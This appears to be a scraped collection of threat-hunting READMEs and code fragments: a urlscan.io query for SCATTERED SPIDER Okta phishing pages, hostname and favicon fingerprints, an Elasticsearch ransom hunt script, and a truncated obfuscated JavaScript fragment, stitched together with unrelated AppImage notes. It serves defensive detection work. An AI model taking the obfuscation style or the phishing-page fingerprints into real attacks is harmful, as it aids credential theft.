kmsec-uk

Hunt for SCATTERED SPIDER infrastructure using urlscan.io

This hunt script leverages a reasonably high fidelity urlscan.io search for SCATTERED SPIDER phishing pages:

stats.requests:<30 domain:oktacdn.com filename:(okta-sign-in.min.js AND okta-sign-in.min.css) page.server:apache NOT (page.domain:okta.com)

The results of this search are then retrieved and stored into results.json.

This list of TLDs is intended to help attribute a domain to a certain country.

The data was drawn from Wikipedia
Only ccTLDs that are attributed to countries with a high confidence are included (i.e. exclude the Generic TLDs)
Only the two-letter ccTLDs are included (for simplicity)

The JavaScript to copy and use in the console at https://en.wikipedia.org/wiki/Country_code_top-level_domain:

Common Hostnames observed on the internet

Hostnames can be a useful fingerprint for detecting attacker infrastructure on the public internet, however some hostnames are commonly observed on the internet and are low confidence indicators.

WIN-0OQJ6NITOBN - Shinjiru VPS default hostname https://www.shinjiru.com.my/
WIN-CLJ1B0GQ6JP - Previously been observed as a low-confidence indicator for abuse in https://community.riskiq.com/article/ade260c6

Install arbitrary AppImages

AppImages often come with the .desktop files and icon assets embedded in the squashfs filesystem.

Unpack the AppImage: [application].AppImage --appimage-extract, note: you can see other appimage options with --appimage-help
Find the relevant files and copy them:

# Copy the .desktop file from the squashfs-root to the .desktop file store in ~/.local/share/applications/
find squashfs-root/ | grep .desktop

	class AADInfo:
	def __init__(self, domain: str) ->None:
	self.domain = domain
	self.brand = ""
	self.tenant_id = ""
	self.region = ""
	self.domains = []
	self.soap_body = f"""<?xml version="1.0" encoding="utf-8"?>
	<soap:Envelope xmlns:exm="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:ext="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:a="http://www.w3.org/2005/08/addressing" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
	<soap:Header>

	function _0x8b6a7(_0x1edf20, _0xa6bb55, _0x214c23, _0x30e79d, _0x3e48f8) {
	return _0x1634(_0x214c23 + 0x49, _0xa6bb55);
	}
	(function (_0x50ca03, _0x428fe8) {
	const _0x399d63 = _0x50ca03();
	while (true) {
	try {
	const _0x597f48 = parseInt(_0x1634(1889, 'Qeak')) / 1 + parseInt(_0x1634(505, ']GEe')) / 2 * (parseInt(_0x1634(1655, ')Izs')) / 3) + parseInt(_0x1634(369, '1uWe')) / 4 * (-parseInt(_0x1634(556, 'NRss')) / 5) + parseInt(_0x1634(1170, 'xv#b')) / 6 + -parseInt(_0x1634(1752, '4qIf')) / 7 * (parseInt(_0x1634(716, 'yYX9')) / 8) + -parseInt(_0x1634(590, '1Kit')) / 9 + -parseInt(_0x1634(939, 'Au2M')) / 10 * (parseInt(_0x1634(469, 'rviH')) / 11);
	if (_0x597f48 === _0x428fe8) {
	break;

	#!/usr/bin/env python3
	import asyncio
	import json
	import aiohttp
	import os
	import re

	api_key = os.environ.get("URLSCAN_API_KEY")

	urlscan_base_url = "https://urlscan.io/api/v1/"

	import aiohttp
	import asyncio
	import json


	class TEAppliance:
	def __init__(self, ip: str, port: int) -> None:
	self.ip = ip
	self.port = port
	self.cookie = (None,)

	#! /usr/bin/env python3.11
	import argparse
	import json
	import requests

	# input file `shodan download readme_indices 'product:elastic "read-me"'`

	parser = argparse.ArgumentParser(description='Ad-hoc elasticsearch ransom hunt')
	parser.add_argument('-f', required=True, type=str,
	help='shodan json data file results from `shodan download [file] [query]')

	import base64
	import re
	import mmh3


	with open('favicon.ico', 'rb') as favicon:
	# 1. To base64
	b64 = base64.b64encode(favicon.read())
	# 2. To string
	utf8_b64 = b64.decode('utf-8')